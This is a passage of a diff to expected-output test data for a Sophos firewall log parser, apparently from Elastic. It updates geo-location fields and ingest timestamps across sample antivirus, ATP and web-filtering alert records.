src_port=57835 dst_port=80 sent_bytes=541 recv_bytes=553 user_agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36\" status_code=403", "code": "030906208001", "kind": "alert", @@ -1406,19 +1356,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 25, @@ -1434,19 +1379,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 56336, @@ -1512,7 +1452,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:55.714958Z", + "ingested": "2021-12-14T14:54:45.179835695Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:35 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=031106210001 log_type=\"Anti-Virus\" log_component=\"SMTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=22 user_name=\"\" av_policy_name=\"default-smtp-av\" from_email_address=\"info@farasamed.com\" to_email_address=\"info@elastic-user.local\" subject=\"ZAHLUNG (PROFORMA INVOICE)\" mailid=\"\u003c20200520004312.Horde.lEUeVf2I6PwO5K5TtMndnC7@webmail.sevengayr\" mailsize=2254721 virus=\"TR/AD.AgentTesla.eaz\" filename=\"\" quarantine=\"\" src_domainname=\"farasamed.com\" dst_domainname=\"\" src_ip=175.16.199.1 src_country_code=DEU dst_ip=175.16.199.1 dst_country_code=DEU protocol=\"TCP\" src_port=56336 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Infected\"", "code": "031106210001", "kind": "alert", @@ -1541,19 +1481,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 25, @@ -1569,19 +1504,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 54693, @@ -1647,7 +1577,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:55.715010100Z", + "ingested": "2021-12-14T14:54:45.179836065Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:36 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=031106210001 log_type=\"Anti-Virus\" log_component=\"SMTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=22 user_name=\"\" av_policy_name=\"default-smtp-av\" from_email_address=\"spedizioni@divella.it\" to_email_address=\"info@elastic-user.local\" subject=\"Re: NEW PRO-FORMA INVOICE\" mailid=\"\u003c20200519072944.AFCA295AF2A037A6@divella.it\u003e\" mailsize=537457 virus=\"Mal/BredoZp-B\" filename=\"\" quarantine=\"\" src_domainname=\"divella.it\" dst_domainname=\"\" src_ip=175.16.199.1 src_country_code=USA dst_ip=175.16.199.1 dst_country_code=DEU protocol=\"TCP\" src_port=54693 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Infected\"", "code": "031106210001", "kind": "alert", @@ -1749,7 +1679,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:55.715016400Z", + "ingested": "2021-12-14T14:54:45.179836457Z", "original": "device=\"SFW\" date=2018-06-06 time=10:51:29 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=036106211001 log_type=\"Anti-Virus\" log_component=\"POPS\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=0 user_name=\"\" av_policy_name=\"None\" from_email_address=\"pankhil@postman.local\" to_email_address=\"pankhil@postman.local\" subject=\"EICAR\" mailid=\"\u003ca5c35e4b-1198-d0eb-0763-c0d5af3c817e@postman.local\u003e\" mailsize=0 virus=\"EICAR-AV-Test\" filename=\"\" quarantine=\"\" src_domainname=\"postman.local\" dst_domainname=\"\" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol=\"TCP\" src_port=56653 dst_port=995 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", "code": "036106211001", "kind": "alert", @@ -1851,7 +1781,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:55.715022700Z", + "ingested": "2021-12-14T14:54:45.179836940Z", "original": "device=\"SFW\" date=2018-06-06 time=10:58:29 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=036206212001 log_type=\"Anti-Virus\" log_component=\"IMAPS\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=0 user_name=\"\" av_policy_name=\"None\" from_email_address=\"pankhil@postman.local\" to_email_address=\"ganga@postman.local\" subject=\"EICAR test email\" mailid=\"\u003c2ca37b7c-e93a-743a-99c4-a0796f0bbb79@postman.local\u003e\" mailsize=0 virus=\"EICAR-AV-Test\" filename=\"\" quarantine=\"\" src_domainname=\"postman.local\" dst_domainname=\"\" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol=\"TCP\" src_port=56632 dst_port=993 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", "code": "036206212001", "kind": "alert", @@ -1945,7 +1875,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:55.715028700Z", + "ingested": "2021-12-14T14:54:45.179837317Z", "original": "device=\"SFW\" date=2018-06-21 time=19:50:23 timezone=\"CEST\" device_name=\"SF01V\" device_id=SFDemo-2df0960 log_id=031006209001 log_type=\"Anti-Virus\" log_component=\"FTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=0 user_name=\"\" virus=\"EICAR-AV-Test\" FTP_url=\"/var/www//home/ftp-user/ta_test_file_1ta-cl1-46\" FTP_direction=\"Upload\" filename=\" /home/ftp-user/ta_test_file_1ta-cl1-46\" file_size=0 file_path=\"/var/www//home/ftp-user/ta_test_file_1ta-cl1-46\" ftpcommand=\"STOR\" src_ip=10.146.13.49 src_country_code=R1 dst_ip=10.8.142.181 dst_country_code=R1 protocol=\"TCP\" src_port=39910 dst_port=21 dstdomain=\"\" sent_bytes=0 recv_bytes=0", "code": "031006209001", "kind": "alert", @@ -2037,7 +1967,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715034600Z", + "ingested": "2021-12-14T14:54:45.179837828Z", "original": "device=\"SFW\" date=2018-06-21 time=19:50:48 timezone=\"CEST\" device_name=\"SF01V\" device_id=SFDemo-2df0960 log_id=031001609002 log_type=\"Anti-Virus\" log_component=\"FTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=0 user_name=\"\" virus=\"\" FTP_url=\"/var/www//home/ftp-user/ta_test_file_1ta-cl1-46\" FTP_direction=\"Download\" filename=\"/home/ftp-user /ta_test_file_1ta-cl1-46\" file_size=19926248 file_path=\"/var/www//home/ftp-user/ta_test_file_1ta-cl1-46\" ftpcommand=\"RETR\" src_ip=10.146.13.49 src_country_code= dst_ip=10.8.142.181 dst_country_code= protocol=\"TCP\" src_port=39936 dst_port=21 dstdomain=\"\" sent_bytes=0 recv_bytes=19926248", "code": "031001609002", "kind": "event", @@ -2063,19 +1993,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, @@ -2141,7 +2066,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.715040600Z", + "ingested": "2021-12-14T14:54:45.179838221Z", "original": "device=\"SFW\" date=2017-01-31 time=18:44:31 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=086304418010 log_type=\"ATP\" log_component=\"Firewall\" log_subtype=\"Drop\" priority=Warning user_name=\"jsmith\" protocol=\"TCP\" src_port=22623 dst_port=80 sourceip=10.198.47.71 destinationip=175.16.199.1 url=175.16.199.1 threatname=C2/Generic-A eventid=C366ACFB-7A6F-4870-B359-A6CFDA8C85F7 eventtype=\"Standard\" login_user=\"\" process_user=\"\" ep_uuid= execution_path=\"\"", "code": "086304418010", "kind": "alert", @@ -2169,19 +2094,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, @@ -2190,19 +2110,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 57579, @@ -2257,7 +2172,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.715046500Z", + "ingested": "2021-12-14T14:54:45.179838722Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:34 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=086504418010 log_type=\"ATP\" log_component=\"Web\" log_subtype=\"Drop\" priority=Warning user_name=\"\" protocol=\"TCP\" src_port=57579 dst_port=80 sourceip=175.16.199.1 destinationip=175.16.199.1 url=http://sophostest.com/callhome/index.html threatname=C2/Generic-A eventid=E91DAD80-BDE4-4682-B7E8-FE394B70A36C eventtype=\"Standard\" login_user=\"\" process_user=\"\" ep_uuid=\"\" execution_path=\"\"", "code": "086504418010", "kind": "alert", @@ -2285,19 +2200,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, @@ -2306,19 +2216,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 57540, @@ -2373,7 +2278,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.715052600Z", + "ingested": "2021-12-14T14:54:45.179839244Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:35 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=086504418010 log_type=\"ATP\" log_component=\"Web\" log_subtype=\"Drop\" priority=Warning user_name=\"\" protocol=\"TCP\" src_port=57540 dst_port=80 sourceip=175.16.199.1 destinationip=175.16.199.1 url=http://sophostest.com/callhome/index.html threatname=C2/Generic-A eventid=34AC8531-E7C0-4368-9978-5740952EE9AB eventtype=\"Standard\" login_user=\"\" process_user=\"\" ep_uuid=\"\" execution_path=\"\"", "code": "086504418010", "kind": "alert", @@ -2401,19 +2306,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 0, @@ -2473,7 +2373,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:44:55.715058500Z", + "ingested": "2021-12-14T14:54:45.179839625Z", "original": "device=\"SFW\" date=2018-06-05 time=08:49:00 timezone=\"BST\" device_name=\"XG310\" device_id=C30006T22TGR89B log_id=086320518009 log_type=\"ATP\" log_component=\"Firewall\" log_subtype=\"Alert\" priority=Notice user_name=\"\" protocol=\"ICMP\" src_port=0 dst_port=0 sourceip=10.198.32.89 destinationip=175.16.199.1 url=175.16.199.1 threatname=C2/Generic-A eventid=C7E26E6F-0097-4EA2-89DE-C31C40636CB2 eventtype=\"Standard\" login_user=\"\" process_user=\"\" ep_uuid= execution_path=\"\"", "code": "086320518009", "kind": "alert", @@ -2501,19 +2401,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, @@ -2585,7 +2480,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715064900Z", + "ingested": "2021-12-14T14:54:45.179840132Z", "original": "device=\"SFW\" date=2017-01-31 time=14:03:33 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=050901616001 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=2 user_name=\"jsmith\" user_gp=\"Open Group\" iap=1 category=\"Entertainment\" category_type=\"Unproductive\" url=\"https://r8---sn-ci5gup-qxas.googlevideo.com/\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=10.198.47.71 dst_ip=175.16.199.1 protocol=\"TCP\" src_port=9444 dst_port=443 sent_bytes=0 recv_bytes=319007 domain=r8---sn-ci5gup-qxas.googlevideo.com exceptions= activityname=\"\" reason=\"\"", "code": "050901616001", "kind": "event", @@ -2611,19 +2506,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, @@ -2632,19 +2522,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 46719, @@ -2702,7 +2587,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715073600Z", + "ingested": "2021-12-14T14:54:45.179840564Z", "original": "device=\"SFW\" date=2017-02-01 time=18:20:21 timezone=\"IST\" device_name=\"SG115\" device_id=S110000E28BA631 log_id=050902616002 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Denied\" status=\"\" priority=Information fw_rule_id=1 user_name=\"\" user_gp=\"\" iap=13 category=\"Religion \u0026 Spirituality\" category_type=\"Unproductive\" url=\"http://hanuman.com/\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol=\"TCP\" src_port=46719 dst_port=80 sent_bytes=0 recv_bytes=0 domain=hanuman.com exceptions= activityname=\"\"", "code": "050902616002", "kind": "alert", @@ -2730,19 +2615,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 5228, @@ -2751,19 +2631,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 49128, @@ -2823,7 +2698,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715134Z", + "ingested": "2021-12-14T14:54:45.179840996Z", "original": "device=\"SFW\" date=2017-02-01 time=18:13:29 timezone=\"IST\" device_name=\"SG115\" device_id=S110016E28BA631 log_id=054402617051 log_type=\"Content Filtering\" log_component=\"Application\" log_subtype=\"Denied\" priority=Information fw_rule_id=1 user_name=\"\" user_gp=\"\" application_filter_policy=8 category=\"Mobile Applications\" application_name=\"Gtalk Android\" application_risk=4 application_technology=\"Client Server\" application_category=\"Mobile Applications\" src_ip=175.16.199.1 src_country_code=DEU dst_ip=175.16.199.1 dst_country_code=USA protocol=\"TCP\" src_port=49128 dst_port=5228 sent_bytes=0 recv_bytes=0 status=\"Deny\" message=\"\"", "code": "054402617051", "kind": "alert", @@ -2851,19 +2726,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, @@ -2872,19 +2742,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 62851, @@ -2950,7 +2815,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715140500Z", + "ingested": "2021-12-14T14:54:45.179841374Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:51 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=050901616001 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=2 user_name=\"\" user_gp=\"\" iap=13 category=\"Information Technology\" category_type=\"Acceptable\" url=\"https://his-eur1-neur1.servicebus.windows.net/$servicebus/websocket\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol=\"TCP\" src_port=62851 dst_port=443 sent_bytes=259 recv_bytes=168 domain=his-eur1-neur1.servicebus.windows.net exceptions=\"\" activityname=\"\" reason=\"\" user_agent=\"\" status_code=\"400\" transactionid=\"\" referer=\"\" download_file_name=\"\" download_file_type=\"\" upload_file_name=\"\" upload_file_type=\"\" con_id=80042000 application=\"\" app_is_cloud=0 override_name=\"\" override_authorizer=\"\"", "code": "050901616001", "kind": "event", @@ -2976,19 +2841,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, @@ -2997,19 +2857,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 60471, @@ -3075,7 +2930,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715146600Z", + "ingested": "2021-12-14T14:54:45.179841821Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:52 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=050902616002 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Denied\" status=\"\" priority=Information fw_rule_id=51 user_name=\"\" user_gp=\"\" iap=2 category=\"IPAddress\" category_type=\"Acceptable\" url=\"https://175.16.199.1/\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol=\"TCP\" src_port=60471 dst_port=443 sent_bytes=0 recv_bytes=0 domain=175.16.199.1 exceptions=\"\" activityname=\"\" reason=\"\" user_agent=\"\" status_code=\"200\" transactionid=\"\" referer=\"\" download_file_name=\"\" download_file_type=\"\" upload_file_name=\"\" upload_file_type=\"\" con_id=642960832 application=\"\" app_is_cloud=0 override_name=\"\" override_authorizer=\"\"", "code": "050902616002", "kind": "alert", @@ -3103,19 +2958,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, @@ -3124,19 +2974,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 65391, @@ -3203,7 +3048,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715152500Z", + "ingested": "2021-12-14T14:54:45.179842336Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:53 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=050901616001 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=2 user_name=\"\" user_gp=\"\" iap=13 category=\"Information Technology\" category_type=\"Acceptable\" url=\"http://update.eset.com/eset_upd/ep7/dll/update.ver.signed\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=175.16.199.1 dst_ip=175.16.199.1 protocol=\"TCP\" src_port=65391 dst_port=80 sent_bytes=980 recv_bytes=295 domain=update.eset.com exceptions=av,https,sandstorm activityname=\"\" reason=\"\" user_agent=\"EFSW Update (Windows; U; 64bit; BPC 7.1.12010.0; OS: 10.0.17763 SP 0.0 NT; TDB 45511; CL 1.1.1; x64s; APP efsw; PX 1; PUA 1; CD 1; RA 1; PEV 0; UNS 1; UBR 1158; HVCI 0; SHA256 1; WU 3; HWF: 01009DAA-757A-D666-EFD2-92DD0D501284; PLOC de_de; PCODE 211.0.0; \" status_code=\"304\" transactionid=\"\" referer=\"\" download_file_name=\"\" download_file_type=\"\" upload_file_name=\"\" upload_file_type=\"\" con_id=248426360 application=\"\" app_is_cloud=0 override_name=\"\" override_authorizer=\"\"", "code": "050901616001", "kind": "event", @@ -3278,7 +3123,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:44:55.715158400Z", + "ingested": "2021-12-14T14:54:45.179842724Z", "original": "device=\"SFW\" date=2016-12-02 time=18:50:20 timezone=\"GMT\" device_name=\"SF01V\" device_id=1234567890123456 log_id=058420116010 log_type=\"Content Filtering\" log_component=\"Web Content Policy\" log_subtype=\"Alert\" user=\"gi123456\" src_ip=10.108.108.49 transaction_id=\"e4a127f7-a850-477c-920e-a471b38727c1\" dictionary_name=\"complicated_Custom\" site_category=Information Technology website=\"ta-web-static-testing.qa. astaro.de\" direction=\"in\" action=\"Deny\" file_name=\"cgi_echo.pl\" context_match=\"Not\" context_prefix=\"blah blah hello \" context_suffix=\" hello blah \"", "code": "058420116010", "kind": "event", @@ -3300,19 +3145,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, @@ -3385,7 +3225,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715164400Z", + "ingested": "2021-12-14T14:54:45.179843117Z", "original": "device=\"SFW\" date=2016-12-02 time=18:50:20 timezone=\"GMT\" device_name=\"SFVUNL\" device_id=C01001K234RXPA1 log_id=050927616005 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Warned\" status=\"\" priority=Information fw_rule_id=2 user_name=\"rich\" user_gp=\"Clientless Open Group\" iap=13 category=\"Search Engines\" category_type=\"Acceptable\" url=\"http://www.google.com/\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=192.168.73.220 dst_ip=175.16.199.1 protocol=\"TCP\" src_port=37832 dst_port=80 sent_bytes=0 recv_bytes=0 domain=www.google.com exceptions= activityname=\" Search\" reason=\"\"", "code": "050927616005", "kind": "event", @@ -3411,19 +3251,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, @@ -3498,7 +3333,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715172700Z", + "ingested": "2021-12-14T14:54:45.179843492Z", "original": "device=\"SFW\" date=2016-12-02 time=18:50:22 timezone=\"GMT\" device_name=\"SFVUNL\" device_id=C01001K234RXPA1 log_id=050901616006 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=2 user_name=\"rich\" user_gp=\"Clientless Open Group\" iap=13 category=\"Search Engines\" category_type=\"Acceptable\" url=\"http://www.google.ca/?gfe_rd=cr\u0026ei=ojxHWP3WC4WN8QeRioDABw\" contenttype=\"text/html\" override_token=\"\" httpresponsecode=\"\" src_ip=192.168.73.220 dst_ip=175.16.199.1 protocol=\"TCP\" src_port=46322 dst_port=80 sent_bytes=0 recv_bytes=619 domain=www.google.ca exceptions= activityname=\"Search\" reason=\"not eligible\"", "code": "050901616006", "kind": "event", @@ -3520,19 +3355,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "user": { @@ -3590,7 +3420,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715179Z", + "ingested": "2021-12-14T14:54:45.179843954Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:57 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062910617701 log_type=\"Event\" log_component=\"Firewall Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"Open Group\" auth_client=\"CTA\" auth_mechanism=\"AD\" reason=\"\" src_ip=175.16.199.1 message=\"User elastic.user@elastic.test.com of group Open Group logged in successfully to Firewall through AD authentication mechanism from 